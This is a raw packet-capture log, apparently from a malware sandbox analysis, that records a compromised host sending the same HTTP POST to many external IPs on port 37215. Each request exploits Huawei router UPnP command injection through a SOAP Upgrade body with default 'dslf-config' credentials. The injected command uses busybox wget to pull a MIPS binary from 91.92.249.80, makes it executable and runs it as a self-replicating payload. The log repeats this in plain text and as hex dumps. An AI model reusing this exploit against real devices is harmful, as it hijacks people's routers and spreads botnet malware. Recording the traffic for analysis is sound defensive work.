                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1675192.168.2.2349488197.67.69.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535105944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1676192.168.2.2347792157.19.155.10037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535136938 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1677192.168.2.234203241.144.15.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535228014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1678192.168.2.236000041.18.45.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535240889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1679192.168.2.2347526157.253.195.17137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535260916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1680192.168.2.2352206157.126.69.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535260916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1681192.168.2.2356600197.122.112.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535387039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1682192.168.2.2339216157.113.124.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535399914 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1683192.168.2.2340950197.80.149.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535479069 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1684192.168.2.235626441.211.152.5737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535485029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1685192.168.2.233562841.14.227.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535510063 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
